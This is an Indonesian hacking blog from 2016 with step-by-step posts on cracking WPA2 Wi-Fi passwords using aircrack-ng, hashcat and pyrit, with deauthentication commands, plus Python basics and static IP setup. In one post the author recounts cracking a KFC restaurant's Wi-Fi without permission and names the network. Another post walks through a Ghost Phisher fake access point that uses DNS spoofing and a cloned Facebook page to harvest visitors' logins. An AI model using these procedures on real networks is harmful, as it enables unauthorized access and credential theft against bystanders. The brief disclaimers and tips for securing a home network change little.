Monday, 7 November 2016

Assalamualaikum Wr Wb

Setelah Lama Admin Tidak Update Blog Karna Kesibukan Admin Di dunia maya dan mengerjakan project,kali ini Admin Mau Membagikan Tutorial Cara Install WPAShot.

Apa Sih WPAShot Itu?
Oke WPAShot Adalah Tools Untuk Audit Kemanan Jaringan Wireless Yang Saya Buat Oleh Saya sendiri,Tools Ini Ditulis Dengan Bahasa Pemrogramman Python.

Tools Ini Juga Membutuhkan Beberapa Tools External Yg Sebagai Berikut:
1.aircrack-ng
2.Leafpad
3.Macchanger
4.xterm
5.Hashcat

Oke Lanjut ke cara install nya:

1.Buka Terminal Dan Ketik Perintah
git clone https://github.com/hardghost07/wpa-shoot.git
2.Jika Sudah Selesai,pindah direktori dengan cara mengetik command
cd wpa-shoot
Nah kita ketik ls munculah beberapa file disitu ada WPAShot.py Dan wpashot2.py.
apa beda nya?
untuk file WPAShot.py beberapa distro rata-rata belum menginstall liblary python bernama termcolor  jadi untuk versi kali linux 2.0 kebawah tidak bisa menjalankan nya,maka dari itu alternatif nya adalah file yang bernama wpashot2.py,oke lanjut.

3.Selanjutnya Ubah Permissions File Nya dengan mengetik command
chmod +x WPAShot.py
chmod +x wpashot2.py

JIka Sudah Kita execute Program nya :D
Ini Screenshot File WPAShot.py:
Ini Screenshot Dari wpashot2.py:

Nah terlihat kan perbedaan wpashot dan WPAShot.py?

Oke Untuk Tutorial Cara pemakaian nya akan saya post di postingan selanjutnya.
JIka Ada kekurangan atau pertanyaan bisa ditanyakan lewat kolom komentar ;)
Sekian Dari saya Wassalamualaikum Wr Wb.

Friday, 8 April 2016


Assalamualaikum Wr Wb
Admin Mau Posting Lagi Tentang WiFi KungFu Lagi Nih :D
Pada Post Sebelum Nya Saya Memakai Tools Aircrack-ng Hashcat,Nah Pada Kali Ini Sekarang Saya Menggunakan Tools Yang Bernama Pyrit.

Apa Itu Pyrit?

Yang Saya Tau Tools Ini Untuk Cracking Wirless Access Point Dengan Enskripsi WPA2 Otentikasi PSK(Pre Shared Key) yang metode cracking nya menggunakan rainbow tables.
admin sendiri kurang tau ttg rainbow tables :D
Yang Pasti Metode Serangan Nya Metode BruteForce Attack Dan Dictionary Attack.

Urutan Proses:


A.Menscan Wireless Acces Point Sekitar Dan Menentukan Target.
B.Menangkap Informasi Client Legal Ke AP tsb,Salah Satu Nya Menangkap Enskripsi Password.
C.Membuat Dan Mengkonfigurasi Database/Rainbow Table Pyrit.
D.Breaking The Password


Tool Dan Bahan:


1.aircrack-ng suite
2.Wordlist
3.Pyrit

Langkah Langkah:


A.Menscan Dan Menentukan Target

Tahap Kali Ini Kita akan menscan wifi sekitar dan menentukan target.

1.Aktifkan Mode Monitor Dengan Mengetik di terminal:

airmon-ng check kill
airmon-ng start wlan0

di sini interface yang di buat adalah wlan0mon,jika mon0 silahkan di kondisikan

2.scan AP Sekitar,Ketik di terminal:

airodump-ng wlan0mon

saya akan memilih HardGhost Security

3.Scan Target Dengan Spesifikasi bssid dan channel,dengan mengetik di terminal:

airodump-ng -c <channel> --bssid <bssid> -w wpacrack <wlan0mon/mon0>

Jangan Tutup Terminal yang ini,Buka terminal baru untuk mencari handshake.

B.Menangkap Informasi Client Ke Acces Point (Handshake).

Pada Tahap Ini Kita akan menangkap informasi AP Nya dengan cara memutus client yang tersambung,setelah terputus client akan Reconnect ke AP
Dan pada saat itulah kita menangkap Informasi AP Tsb/Enskripsi.

4.Lalu Kita Akan mengirim Paket DeAuth Untuk memutus client (lihat di bagian station itu adalah mac address client) dengan mengetik:

aireplay-ng --deauth 1 -a <bssid> -c <station/mac adress> <wlan0mon/mon0>

Tips Untuk Cepat Mendapatkan Handshake:
1.Sobat Harus Dekat Dengan AP
2.Jeda Sejenak Setelah Mengirim Paket Deauth,karna client sedang Reconnect ke AP
3.Pilih Client Dengan Nilai Frame Terbesar.

Jika Sudah Mendapatkan Handshake Ada Tulisan WPA HANDSHAKE bla bla di terminal yang sedang menjalankan airodump-ng.
contoh handshake:

C.Membuat Database Pyrit Dan Menkonfigurasi Database.
Pada Kali Ini Kita akan membuat database dari pyrit tsb.

5.Sebelum nya Kita Menyaring Wordlist Yang Karakter Nya Hanya 8 Karakter,Ketik di terminal

cat <letak wordlist> | sort | uniq | pw-inspector -m 8 -M 63 > wordlist.txt
mv wordlist.txt wpa.lst

proses nya sekitar 2 menit/5 menit tergantung wordlist,dan wordlist nya ada 96 juta password.

6.Selanutnya kita membuat database pyrit dengan mengetik:
 pyrit -e wpacrack create_essid

7.Sekarang Kita Membuat HASH dari wpa.lst Untuk pyrit ketik di terminal:

pyrit batch


8.Sekarang Kita Memasukan/Mengimport Wordlist Ke Database Ketik Di Terminal:
pyrit -i wpa.lst import_password

dan suhu processor pun naik saya sarankan untuk tidak sampai selesai Karna Selain Lama,Suhu Laptop Akan Naik.
Saya SarankanTunggu sampai 5 menit Kemudian tekan ctrl + c. jika ingin berhasil,tunggu saja proses menggenerate nya sampai selesai.

D.Breaking The Password

9.Oke Sekarang Tahap Terakhir Yaitu Proses Cracking nya,oke langsung saja Ketik Di Terminal:

pyrit -r wpacrack-01.cap -i wpa.lst attack_passthrough

Proses Cracking nya pun sedang berjalan......
Proses nya tergantung dari wordlist semakin banyak wordlist yang tidak cocok,semakin lama prosesnya.

dann taraaa ternyata password nya hardghostsecurity :D

Dan Tips Terakhir untuk sobat yang mempunyai Wireless Access Point Di Rumah:

1.Gunakan Enskripsi WPA2/PSK Jangan WPS,WEP,OPN.
2.Gunakan Password yang sulit di tebak.
3.Gunakan Mac Filtering.

Gimana Lumayan Susah Kan Sobat? :D
Yah Memang Hacking itu gak ada yang instan ya sobat,jika hanya klik ini klik itu anak kecil pun bisa Tapi Tidak tahu cara kerja nya.
Kita Harus Tau Proses Nya Dan Bagaimana Cara Kerja nya.

Jika Ingin Copas,Silahkan Saja Asalkan Tau Diri :)
Sekain Dari Saya Semoga Bermanfaat,Jangan Gunakan Ilmu Hacking Mu Untuk Kejahatan,Jadilah Ethical Hacker ;)

Wassalamualaikum Wr Wb

Author: Hardian Alkori

Thursday, 7 April 2016


Assalamualaikum Wr Wb

Pada Kesempatan kali ini Admin Bakal Share Cracking WPA2/PSK Dengan Hashcat.

Wah Kok Pake Hashcat? Bukanya Itu Untuk Cracking Hash ya?.
Hehe Hashcat Ini Fungsi Nya Bukan hanya Untuk Mendecrypt Hash Seperti MD5 SHA-1 MySQL323 Dll Tapi Bisa Juga Untuk Cracking Enskripsi WPA2 Dengan Otentikasi PSK (Pre Shared Key).
Yang Belum Tau Hashcat Bisa Cari Sendiri Di Google :p

Terus Ini Proses nya Online Tidak?
Sama Seperti Aircrack-ng,Metode Dengan Hashcat Proses Cracking Nya Offline Karna Kita Telah Mendapatkan Enskripsi (Handshake) Dari Client Yang Terhubung.

Adapun Cara Kerjanya:

1.Menscan Acces Point Target.
2.Menangkap Informasi Dari Client Ke Acces Point (Handshake) Khusus Nya Untuk Enskripsi Password Nya.
3.Mengkonversi File *.cap menjadi *.hccap.
4.Cracking Enskripsi Nya.

Tools Dan Bahan:
1.aircrack-ng suite
2.Hashcat
3.Wordlist Bisa Download Di sini.

Langkah Langkah:


A.Menscan Access Point Target


Tujuan Kita Adalah Untuk menscan informasi dari acces point tsb
1.Aktifkan Mode Monitor Dengan Mengetik di terminal

airmon-ng check kill
airmon-ng start wlan0

Disini Interface yang di buat adalah wlan0mon,jika sobat interface nya mon0 silahkan di kondisikan ;)

2.Scan Target Dengan Mengetik

airodump-ng wlan0mon

jika sudah tekan ctrl+c,Sekarang Yang Kita Butuhkan adalah bssid dan channel.
saya memilih HardGhost Security

3.Scan Target Dengan Spesifikasi channel dan bssid dengan mengetik

airodump-ng -c <channel> --bssid <bssid> -w wpacrack <mon0/wlan0mon>

Jangan Tutup Terminal Ini,Sobat Buka Terminal Baru Untuk Mencari Handshake.


B.Menangkap Informasi Dari Client Ke Acces Point (Handshake).

Pada Tahap Kali Ini Tujuan Nya Untuk Menangkap Informasi Client Legal pada AP Tsb,Dan Tahap Ini Juga Kita Akan Menangkap Enskripsi Nya.

4.Sekarang Kita Mengirim Deauth untuk Memutus Client Yang ada,Station Itu Adalah Client nya.
Ketik di terminal yang sudah sobat buka tadi:
airepaly-ng --deauth 1 -a <bssid> -c <mac address client/station> <mon0/wlan0mon>

Tips Untuk cepat mendapatkan handshake:
1.Sobat Jaraknya Harus Dekat Dengan Acces Point.
2.Pilih Client Dengan Nilai Frame Paling Besar.

contoh sudah mendapatkan handshake:

C.Menkonversi File Cap Menjadi hccap.

Pada Tahap Kali Ini,Kita Menconvert File Handshake (.cap) menjadi .hccap,Yang Awalnya semua informasi dari client ke acces point menjadi enskripsi nya saja

5.Selanjutnya menkonversi cap menjadi hccap dengan mengetik:

wpaclean wpacrack-02.cap wpacrack-01.cap

kemudian ketik perintah:

aircrack-ng wpacrack-02.cap -J wpacrack-03.cap

Dan Terlihat Enskripsi Nya :D

4.Cracking Enskripsi Nya Dengan Hashcat.


6.Selanjutnya Crack Enskripsinya Dengan Hashcat Dengan Mengetik Di Terminal:

hashcat -m 2500 -a 0 -o hasil.txt wpacrack.cap.hccap <letak wordlist>

Proses Tergantung Dari wordlist nya sendiri tapi tenang hashcat kecepatan membaca nya wow kok :D

Jika Sudah Selesai Output Nya seperti ini:

Untuk Melihat hasil nya buka file bernama hashcat.pot atau hasil.txt dan yang saya dapat adalah:  hardghsotsecurity

Mudah Bukan Sobat?
Ada Yang Lebih Mudah Lagi Yaitu Menggunakan Tools Aircrack-ng untuk tutor nya bisa liat di sini.

Tips Untuk Sobat Yang Wifi Nya Ingin Susah Di Hack:

1.Gunakan Enskripsi WPA2/PSK,Jangan Menggunakan WPS.WEP dll.
2.Gunakan Password yang sulit di tebak.

Hanya Itu Saja Yang Bisa Saya Berikan Mudah Mudahan Bermanfaat,Jangan Gunakan Untuk Kejahatan Admin Tidak Bertanggung Jawab.

Untuk Yang Ingin Copas,Silahkan Copas Saja Asalkan Tau Diri :)
Sekian Dari Saya Wassalamualaikum Wr Wb.

Author: Hardian Alkori

Tuesday, 5 April 2016


Assalamualaikum Wr Wb.

Pada Kesempatan Kali Ini Bukan Tentang Cracking Password Wireless Access Point Tapi Cara Mengetes Wireless Adapter Untuk Packet Injection apakah support injection atau tidak.

Mengapa Harus Di Test?
Karna Untuk Menguji/Testing Kemampuan Injection Wireless Adapter Sobat,Dan Juga Untuk mengetahui interface Wireless Wifi Anda mendukung Packet Injection yang sangat penting untuk Sobat Yang Ingin Melakukan Cracking Password Wireless Acces Point.
Bukan Hanya Itu Juga Tapi Untuk Mengetes Apakah Sobat Berada Dijarak Yang Cukup Dari Acces Point.

Step Step Nya:

1.Buka Terminal kemudian Ketik:


airmon-ng check kill
airmon-ng start wlan0


di sini inteface yang saya buat adalah mon0 jika wlan0mon silahkan di kondisikan.

2.Selanjutnya Kita Scan Wifi Yang ada di sekitar kita dengan mengetik

airodump-ng <mon0/wlan0mon>


jangan tutup terminal ini,buka terminal yang baru untuk melakukan test.

3.Jika Sobat Ingin Melakukan Packet Injection Ke Akses Point Tertentu ketik perintah:


aireplay-ng -9 -e <nama essid> -a <bssid> <wlan0mon/mon0>


dan jika ingin melakukan packet injection ke seluruh acces point ketik perintah


aireplay-ng --test <wlan0mon/mon0>

kemudian enter,dan Ternyata Injection Working! :D

4.Coba Kalian Lihat Di Terminal Yang Sedang Membuka airodump-ng,ternyata banyak paket yang di inject ke AP Tsb.

Gimana Support Atau Tidak Wireless Adapter Sobat?
Kesimpulan:
1.Wireless Adapter Tujuanya Untuk Menguji/Testing Kemampuan Injection Wireless Adapter,Dan Juga Untuk mengetahui interface Wireless Wifi  mendukung Packet Injection
2.Setiap Paket Yang Dikirimkan Ke Setiap AP Berjumlah 15-30

Hanya Itu Saja Yang Bisa saya Berikan Semoga Bermanfaat Bagi Sobat :)

Wassalamualaikum Wr Wb

Author: Hardian Alkori

Wednesday, 23 March 2016

Assalamualaikum Wr Wb
Pada Kesempatan Kali Ini Admin Mau Share Tentang Networking,Sekali Sekali Lah share Networking :D
Kali Ini Admin mau membagikan cara setting IP Statis di Linux Lewat Virtualbox.
Wah Linux Ya? Berarti Susah Dong,,Hehe Engga Kok Linux Itu Gak Susah Kalo Di Pelajarin :)

Lanjut Ke Step nya

Yang kita butuhkan hanyalah OS Debian Yang Terinstall Di Virtualbox,jika belum silahkan install dulu OS Nya di virtualbox,untuk tutor nya akan saya share.

Step By Step:

1.Nyalakan Mesin VirtualboxnyAa Kemudian Login,saya sarankan menggunakan akun root agar mudah.

2.ketik di terminal pico /etc/network/interfaces,kemudian ikuti syntax nya di bawah ini.

Jika sudah tekan ctrl+x kemudian y kemudian enter.

3.Selanjut nya restart networking nya dengan mengetik:
/etc/init.d/networking restart

4.Kemudian Coba ping <ip kalian>,jjika hasil nya reply from bla bla,berarti sukses :D

Jika belum mengerti sobat bisa lihat video saya di bawah ini:


Oke Mudah bukan?
Ya Hanya Itu Saja Yang Bisa saya Berikan Kurang Lebih Nya Mohon Dimaafkan ;)
Wassalamualaikum Wr Wb

Author: Hardian

Tuesday, 22 March 2016


Assalammualaikum Wr Wb.

Pada Kesempatan kali ini admin mau share cara cracking wifi dengan keamanan wpa2,Artikel ini saya buat kemarin malam saat saya makan-makan di kfc.
kebetulan di sana ada wifi,saya pun iseng mencoba tools aircrack untuk mendapatkan yapassword dari wifi tsb :D

apa itu aircrack-ng?
Aircrack-ng adalah suatu tools auditor security yang ditujukan untuk penetration testing
keamanan jaringan wireless. Aircrack memiliki kemampuan untuk melakukan
cracking 802.11 WEP dan WPA-PSK dengan menggunakan berbagai metode seperti FMS,PTW atau brute force attacks.

aircrack Itu Metode Serangan Nya Brute Force Attack Jadi Sobat Harus Menggunakan Wordlist,
Jika sobat belum punya wordlist sobat bisa download disini

ada pun tools yang digunakan adalah:
1.aircrack-ng
2.airodump-ng
3.aireplay-ng
4.airmon-ng

Langkah langkah:

1.Buka Terminal Ketik:

airmon-ng check kill
airmon-ng start wlan0,

Maka Akan Terbuat Interface Untuk Memonitor.di sini interface yang terbuat adalah mon0,jika berbeda/wlan0mon silahkan di kondisikan.

2.Selanjutnya Ketik

airodump-ng mon0

Kemudian Terlihat Informasi Dari Wifi Tersebut,yang kita butuhkan adalah bssid,channel,dan essid Jika Sudah Tekan ctrl+c.
Disini saya menemukan bssid 38:2C:4A:A7:AE:F2,Dengan Channel 6,essid KFC-Mangun Jaya 02.

3.Selanjutnya Kita Menscan Dengan Spesifikasi bssid dan channel dengan mengetik:

airodump-ng -c <channel> --bssid <bssid> -w wpacrack mon0


jangan ditutup terminal yang ini,selanjutnya buka terminal yang baru untuk mendapatkan Handshake.
yang kita butuhkan adalah bssid dan mac address dari client tsb.

4.Selanjut Nya KIta Mencari Handshake,tujuan KIta Mendapatkan handshake itu untuk mencapture informasidari Acces Point Dan Client Yang terhubung,yang kita butuhkan adalah bssid dan mac adress dari client. Ketik Perintah Ini Di Terminal


aireplay-ng --deauth 5 -a <bssid> -c <mac address/client> mon0


Kemudian enter,Untuk Melihat Handshake atau tidak,Kalian Buka terminal yang sedang menjalankan airodump-ng tadi.
jika sudah handshake ada tulisan wpa handshake blablabla di pojok kanan atas airodump-ng.jika belum handshake tekan atas kemudian enter sampai handsahe.
ini contoh jika sudah mendapatkan handshake:

Tips dari admin jika ingin cepat mendapatkan handshake,:
-Anda harus dekat dengan client
-Pilih CLient Yang Nilai Frame nya paling besar.

5.Selanjutnya kita crack password nya dengan aircrack dengan mengetik perintah:


aircrack-ng -w <letak wordlist> -b <bssid> wpacrack-01.cap


tunggu sampai Password ditemukan,Proses nya tergantung dari ke akuratan wordlist nya jika kurang akurat kemungkinan gagal.

jika sudah ketemu hasil nya seperti ini:

Dan taraa paswword nya ternyata 123a456b789c :D

Dan Ini SS Real lainya dari hasil menggunakan aircrack:

Mudah Bukan?
Tips dari saya untuk sobat yang wifi nya ingin susah untuk di crack yaitu gunakan password yang sulit di tebak.
gunakan enskripsi WPA2/WPA,Jangan menggunakan WPS,WEP Karna Mudah Di Crack.

Ya Hanya Itu Saja Yang Bisa Saya  Berikan,semoga bermanfaat :)

Wassalamualaikum Wr Wb.

Author: Hardian Alkori

Tuesday, 8 March 2016


Assalamualaikum Wr Wb.

Pada Kesempatan Kali Ini Admin Bakal Share Tentang Hacking yaitu Membuat Page Phising Dengan Ghost Phisher.
Sebelum Nya Yang Sobat Tau Cara Membuat Page Phising + DNS Spoof Yaitu Dengan 2 Tools Yaitu Social Engineer Toolkit + Ettercap.
Nah Admin Kali Ini Memberikan Tutor Membuat Page Phising + DNS Spoofing dengan Ghost Phisher.

Tools Ghost Phisher Ini Telah Ter Include Di Kali Linux Rolling 2016.1 Edition,So Yang sudah memakai Kali Linux Rolling Langsung Aja.

Langsung Aja Ke Step Step Nya.

WARNING !!: Admin Tidak Bertanggung Jawab Jika Terjadi apa apa.

Syarat:
Menggunakan Modem USB Atau Modem Hp (usb0) untuk membuat page deface nya,dan wlan0mon untuk membuat Fake Acces Point Nya.

Langkah Langkah:

1.Sambungkan Modem/Modem HP
2.Ketik Di Terminal airmon-ng check kill > airmon-ng start wlan0
3.Scan Informasi Target Dengan airodump-ng wlan0mon,Perhatikan essid (nama wifi),dan Channel
.
4.Kemudian Buka Ghost Phisher Di Application > Wireless Attacks > Ghost Phisher.
5.Setting Di Bagian Fake Ap,Klik Refresh Wireless Card > set monitor > Di Kolom essid masukan nama wifi > ip adress masukan ip lokal sobat.
> di kolom channel masukan channel target > Kemudian Start
.
6.Setting Bagian Fake DNS Server,Tandai lingkaran "Respond With Fake Adress Only" > Di Kolom Address Masukan ip local,dibagian website masukan Http://www.facebook.com > add > start.

7.Setting Dibagian Fake HTTP Server. Centang Clone Website > Di Bagian Kolom nya isi http://www.facebook.com > di kolom real website adress isikan ip local ssobat > start.

8.Kemudian Tinggal Tunggu,Untuk Hasil Bisa Di Liat Di Bagian Harvested Credential.

Biar Lebih Afdol Deauth Acces Point Target Dengan Mdk3/aireplay-ng Agar Client terputus dan Client Insha allah akan connect ke Fake AP Sobat.

Oke Sekian Dari Admin Semoga Bermanfaat :)
Wassalamualaikum Wr Wb

Author: Hardian Alkori

Monday, 7 March 2016


Assalamualaikum Wr Wb.

Setelah Saya Posting "Membuat Program Sederhana Dengan Instruksi Print",Sekarang Saya Ingin Posting Cara Membuat Program Biodata.
Yang Di butuhkan hanyalah Function print dan variabel.

Oke Langsung Ke Program nya.

Pertama,Buka Teks Editor,Dan Pelajari Bagaimana Flow/Aliran Script/Kode Ini Bekerja.
Adapun Algoritma nya:

Algoritma/Aliran:
1.Mulai,Tempat Path Python
===Variabel====
2.Masukan Nama
3.Masukan Alamat
4.Masukan TTL
5.Jenis Kelamin
6.Masukan Agama.
7.Masukan Pekerjaan.
8.Masukan Hoby
9.Masukan Kata Mutiara
10.Mencetak Inputan User Dari variabel/pengenal diatas
11.selesai

Kedua,Copy Source Code Dibawah Ini

#!/usr/bin/python

print "============="
print "   Biodata   "
print "============="
#variabel
nama= raw_input ("Masukan Nama Anda: ")
alamat= raw_input ("Masukan Alamat: ")
ttl= raw_input ("Masukan Tempat Tanggal Lahir Anda: ")
jk= raw_input ("Jenis Kelamin: ")
agama= raw_input ("Masukan Agama: ")
pekerjaan= raw_input ("Pekerjaan: ")
hoby= raw_input ("Masukan Hoby: ")
km= raw_input ("Kata Mutiara: ")

#Menampilkan Inputan User
print "============"
print "Biodata Anda"
print "============"
print "Nama: ",nama
print "Alamat: ",alamat
print "Tempat Tanggal Lahir: ",ttl
print "Jenis Kelamin: ",jk
print "Agama: ",agama
print "Pekerjaan: ",pekerjaan
print "Hoby: ",hoby
print "Kata Mutiara: ",km

Ketiga,Save dengan nama biodata.py Kemudian Jalan kan Lewat Terminal.
Maka Output/Hasil Nya Seperti Ini: 



Kesimpulan:
Variabel Berfungsi sebagai Pengenal Yang Bisa Di Panggil Untuk Menampilkan Inputan Dari User.

Oke Bisa Kan? Untuk Postingan Selanjut Nya Akan Saya Post.
Jika Ada Pertanyaan/Kurang Jelas Bisa Tulis Pertanyaan Di Kolom Komentar.

Saya Akhiri,Wassalamualaikum Wr Wb

Author: Hardian Alkori
Assalamualaikum Wr Wb

Pada Kesempatan Kali Ini Admin Bakal Share Tentang Programming,Kali Ini Admin Menggunakan Bahasa
Pemrogramman Python.
Oke Langsung ya ;)

Oke Instruksi print Dalam Python Sama Saja Fungsi Nya Dengan writeln pada Pascal,
Yaitu Menampilkan Teks di Jendela.

Nah Kali Ini Admin Akan Membuat Program Sederhana dengan Perintah print.
Lanjut Ke Program Nya.
Pertama Buka Teks Editor: GEdit,Pluma,Notepad,Mousepad
kemudian Ketik Script ini:

#path dari python
#!/usr/bin/python

#instruksi menampilkan teks di jendela
print "Hardghost Security"

Kemudian Simpan Dengan Format *.py,simpan di direktori mana saja saya sarankan untuk membuat folder baru Di root.
kemudian buka terminal

cd DirektoriAnda
chmod +x print.py
./print.py

Maka Output Nya Seperti Ini:


Nahh Selanjut Nya Kita Menggunakan Variabel,Variabel Ini Fungsi Nya Sebagai Pengenal,Perhatikan Program Berikut

#!/usr/bin/python
#Variabel
nama= "Hardian"
#instruksi untuk mencetak,(nama) adalah variabel
print "Nama Saya Adalah",nama

Simpan Dan Output Nya Seperti Ini:

Kadang Juga Program Butuh Inputan Dari User Nya,Sekarang Kita Menggunakan Function raw_input.
oke lanjut ke program nya:

#!/usr/bin/python
nama=raw_input ("Masukan Nama: ")
print "Nama Anda Adalah",nama

maka output nya seperti ini:

Kesimpulan:
1.Print Adalah Function Untuk Mencetak kata.
2.Variabel/Pengenal Berfungsi Untuk Pengenal/Memanggil.
3.raw_input adalah Function Untuk Meminta Inputan Dari User.

Oke Bisa Kan? Kelanjutan Dari Postingan Ini Bakal Admin Update Lagi Nanti Oleh Admin.

Sekian Dari saya Sampai ketemu di postingan selanjutnya ;)

Wassalamualaikum Wr Wb

Author: Hardian Alkori

About Me

My Photo
Bekasi, Jawa Barat, Indonesia
HardGhost Security Blog Yang Membahas Tentang Programming,Networking Dan Securitty.
HardGhost Security 2016. Powered by Blogger.

Quote

Think Big Thoughts,But Relish Small Pleasure

Theme Support

BTricks

Video Pentesting

Popular Posts

Our Facebook Page